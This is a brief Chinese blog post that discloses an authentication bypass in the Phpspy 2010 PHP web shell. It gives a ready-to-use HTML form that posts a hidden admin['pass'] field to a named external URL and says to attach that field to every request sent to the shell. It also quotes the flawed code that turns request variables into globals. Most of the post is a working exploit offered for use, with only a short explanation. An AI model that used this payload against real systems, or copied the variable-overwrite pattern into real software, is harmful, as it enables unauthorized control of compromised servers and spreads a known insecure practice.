Phpspy 2010 身份验证绕过漏洞

2011, April 23, 9:02 PM. PHP学习
Submitted by admin


利用代码:
<form method="POST" action="http://mirc.3est.com/1.php">
<input type="hidden" name="admin['pass']" value="1">
<input type="submit" value="Login">
</form>

在每次向shell请求数据的时候 都附加post一个admin['pass']即可。
形成原因:
2009不存在该洞,仅限2010版本,对比二者即可得到答案:
 foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):